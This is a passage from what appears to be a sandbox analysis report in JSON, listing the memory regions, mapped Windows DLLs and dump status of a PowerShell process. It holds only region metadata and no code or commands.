"pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001532-addr_0x0000000000160000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_250", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1532", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001533-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_251", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1533", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2568191, "entry_point": 2555904, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1534", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001535-addr_0x0000000000280000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_252", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_1535", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001536-addr_0x0000000000290000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_253", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_1536", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 5341183, "entry_point": 0, "filename": null, "id": "region_1537", "name": "pagefile_0x0000000000390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3735552, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6950911, "entry_point": 0, "filename": null, "id": "region_1538", "name": "pagefile_0x0000000000520000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5373952, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 27983871, "entry_point": 0, "filename": null, "id": "region_1539", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001540-addr_0x0000000001ab0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_254", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 27987967, "entry_point": 0, "filename": null, "id": "region_1540", "name": "private_0x0000000001ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27983872, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1541", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1542", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:08.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1543", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1544", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_1545", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791729963008, "type": "region", "version": 1 }, "end_va": 8791730065407, "entry_point": 8791729967528, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1546", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791729963008, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1547", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:08.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1548", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:08.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1549", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:08.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1550", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:08.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1551", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:08.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1552", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:08.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1553", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:08.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1554", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:08.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1555", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:08.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1556", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:08.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1557", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:08.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1558", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:08.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1559", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:08.638", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001565-addr_0x0000000001ac0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_255", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_1565", "name": "private_0x0000000001ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28049408, "timestamp": "00:01:08.670", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001566-addr_0x0000000001c30000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_256", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 0, "filename": null, "id": "region_1566", "name": "private_0x0000000001c30000", "norm_filename": null, "region_type": "private_memory", "start_va": 29556736, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001567-addr_0x0000000001dd0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_257", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_1567", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1568", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29102079, "entry_point": 0, "filename": null, "id": "region_1637", "name": "pagefile_0x0000000001bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29097984, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 29167615, "entry_point": 0, "filename": null, "id": "region_1638", "name": "pagefile_0x0000000001bd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29163520, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 29237247, "entry_point": 0, "filename": null, "id": "region_1639", "name": "pagefile_0x0000000001be0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29229056, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 29298687, "entry_point": 0, "filename": null, "id": "region_1640", "name": "pagefile_0x0000000001bf0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29294592, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29360128, "type": "region", "version": 1 }, "end_va": 29368319, "entry_point": 0, "filename": null, "id": "region_1641", "name": "pagefile_0x0000000001c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29360128, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29442047, "entry_point": 29425664, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1642", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29425664, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29495295, "entry_point": 0, "filename": null, "id": "region_1643", "name": "pagefile_0x0000000001c20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29491200, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 30535679, "entry_point": 0, "filename": null, "id": "region_1644", "name": "pagefile_0x0000000001c40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29622272, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 30666751, "entry_point": 30539776, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1645", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 30539776, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001646-addr_0x0000000001d40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_285", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 31195135, "entry_point": 0, "filename": null, "id": "region_1646", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:01:09.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31211519, "entry_point": 31195136, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1647", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 31195136, "timestamp": "00:01:09.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 31981567, "entry_point": 31784960, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1648", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 31784960, "timestamp": "00:01:09.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 32399359, "entry_point": 31981568, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1649", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 31981568, "timestamp": "00:01:09.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001650-addr_0x0000000001f10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 33095679, "entry_point": 0, "filename": null, "id": "region_1650", "name": "private_0x0000000001f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 32571392, "timestamp": "00:01:09.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001651-addr_0x0000000002010000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 34144255, "entry_point": 0, "filename": null, "id": "region_1651", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34144256, "type": "region", "version": 1 }, "end_va": 37089279, "entry_point": 34144256, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1652", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34144256, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 41234431, "entry_point": 0, "filename": null, "id": "region_1653", "name": "pagefile_0x0000000002360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37093376, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001654-addr_0x0000000002880000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1654", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001655-addr_0x0000000002960000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43384832, "type": "region", "version": 1 }, "end_va": 43909119, "entry_point": 0, "filename": null, "id": "region_1655", "name": "private_0x0000000002960000", "norm_filename": null, "region_type": "private_memory", "start_va": 43384832, "timestamp": "00:01:09.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791631921152, "type": "region", "version": 1 }, "end_va": 8791631970303, "entry_point": 8791631926144, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_1656", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791631921152, "timestamp": "00:01:09.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791631986688, "type": "region", "version": 1 }, "end_va": 8791632199679, "entry_point": 8791631992976, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_1657", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791631986688, "timestamp": "00:01:09.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791659053056, "type": "region", "version": 1 }, "end_va": 8791659577343, "entry_point": 8791659072140, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_1658", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791659053056, "timestamp": "00:01:09.225", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791659577344, "type": "region", "version": 1 }, "end_va": 8791659638783, "entry_point": 8791659581504, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_1659", 